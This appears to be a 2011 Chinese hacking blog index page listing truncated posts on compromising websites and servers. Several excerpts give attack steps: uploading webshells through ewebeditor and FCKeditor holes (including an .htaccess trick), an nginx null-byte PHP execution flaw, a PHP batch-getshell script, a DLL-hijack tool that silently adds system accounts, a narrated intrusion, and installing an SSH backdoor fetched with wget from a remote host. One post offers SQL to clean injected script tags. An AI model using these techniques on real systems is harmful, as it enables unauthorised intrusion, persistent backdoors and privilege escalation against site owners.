清除sql数据库挂马代码.txt

分类:技术 | 2011-08-28 | 撸过 458 次
0人扯谈

declare @delStr nvarchar(500)
--set @delStr='<script src=http://www.webshell.cc/cn.js>'
set @delStr='<script src=https://www.webshell.cc/cn.js></script>'
/****************************************/

/**********以下为操作实体************/
set nocount on

declare @tableName nvarchar(100),@col[......]

继续阅读

常见编辑器漏洞

分类:安全 | 2011-08-28 | 撸过 785 次
0人扯谈

常见的编辑器漏洞有:

ewebeditor
ewebeditornet
fckeditor
editor
southidceditor
SouthidcEditor
bigcneditor
一:ewebeditor为例
1:默认下载下来的后台:
http://www.webshell.cc/ewebeditor/admin_login.asp

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览

在编辑器里点设计 然后直接上传asa大马.

上传后 在代码里可以看到马的位置!

(原理:[......]

继续阅读

nginx的旧版本可能执行任意代码0day

分类:安全 | 2011-08-27 | 撸过 413 次
0人扯谈

这个绝对是大0day哦。非常给力。测试了几个大站。全OK。哈哈。跟上一次那个漏洞有的一比哦。

Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问

webshell.jpg%00.php来执行其中的代码。影响版本:0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37。

请各位站长检查服务器版本,尽快升级!!

YxShop 上传漏洞批量shell

分类:安全 | 2011-08-27 | 撸过 613 次
0人扯谈

这个是根据一篇文章来的思路
文章名字 好像叫做批量Getshell 一例吧
借用了里面在百度获取URL的代码!!自己写了上传shell的代码!
php学的不是很好,大牛们看了就别踩了!!
这个主要是给大家批shell时拿来修改的!
这个是测试图

贴出来代码:

<?php
print_r('
[*]  Getshell for Exploits
[-]  by : [email]cfking@90sec.org[/email]
[-]  -----------------------------------
[-]  Get URL ......
                ');[......]

继续阅读

提权工具Ws2Help.dll

分类:工具 | 2011-08-27 | 撸过 717 次
1人扯谈

上传到sougou目录,注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。

使用方法:把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户
                  需要创建的用户名和密码可以十六进制修改。

Ps:

一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。

比如这个迅雷,他启动时会调用Ws2Help.dll这个组件,
一般的情况,这个组件是我们的windows默认就有的
但是程序调用组件有这样一个顺序,他会首先在程序所在的文件夹寻找,如果没有他就再去系统目录寻找这个组件。

这个就是利用这个顺序差的原因来利用[......]

继续阅读

记一次踩着别人的脚印入侵

分类:安全 | 2011-08-27 | 撸过 852 次
0人扯谈

话说今早不知道怎么逛到http://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页

看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点

哇!!这个站还真不少..72个,其实还是有好多没法打开..
开始一个一个的弄,注入,弱口令,这个完全是体力活了,终于让我进入了一个后台

添加的样式为php,过滤掉了ASP和ASA。

在PHP里面上传我们的ASP马儿,看起来舒服点PS:主要是不懂得php和数[......]

继续阅读

ssh后门的设置与登入

分类:安全 | 2011-08-26 | 撸过 834 次
0人扯谈

ssh后门的设置与登入  
1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
shell-# wgethttp://192.168.1.188/sshbd.tgz
shell-# tar zxvf sshbd.tgz
shell-# cd openssh

4、设置ssh后门的登录密码:
vi versio.h
#define SSH_VERSION "OpenSSH_4.2" --> you've to edi[......]

继续阅读

天朝网站被黑

分类:新闻 | 2011-08-26 | 撸过 531 次
2人扯谈


真是杯具了 啊 …… 看来 哪里都有不怕死的 ……

 

地址已经失效!

FCKeditor编辑器全部版本另类上传漏洞

分类:安全 | 2011-08-26 | 撸过 840 次
0人扯谈

利用步骤:
1.创建一个htaccess文件:
代码内容:

SetHandler application/x-httpd-php

2.实用编辑器上传htaccess文件.

http://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html

https://www.webshell.cc/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shel[......]

继续阅读

iis的几个vbs脚本在渗透中的应用

分类:安全 | 2011-08-26 | 撸过 1,073 次
0人扯谈

有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法

1.查询IIS里的所有网站

C:WINDOWSsystem32>cscript.exe iisweb.vbs /query
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

正在连接到服务器 …已完成。
Site Name (Metabase Path) Status IP Port Host

===============================[......]

继续阅读

第 2 页,共 14 页12345...10...最旧 »